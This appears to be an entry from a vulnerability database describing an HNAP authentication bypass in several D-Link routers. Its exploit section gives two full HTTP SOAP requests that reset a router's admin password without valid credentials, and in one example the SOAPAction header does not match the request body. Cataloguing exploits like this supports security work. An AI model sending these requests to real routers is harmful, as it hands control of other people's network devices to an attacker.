ID

VAR-E-201001-1162

TITLE

D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability

DESCRIPTION

Multiple D-Link routers are prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to bypass security restrictions and access certain administrative functions.
This issue affects the following routers:
DI-524
DIR-628
DIR-655

AFFECTED PRODUCTS

EXPLOIT

An attacker can exploit this issue by using readily available network utilities.
The following example requests are available:
Example 1:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:8099
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
Content­Length: 453
<?xml version="1.0" encoding="utf­8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema­instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>
Example 2:
POST /HNAP1/ HTTP/1.1
Authorization: Basic dXNlcjo=
Host: 192.168.0.1
SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
Content­Length: 453
<?xml version="1.0" encoding="utf­8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema­instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>

PRICE

Free

TYPE

Design Error

CREDITS

SourceSec Security Research

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:55:00.611000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE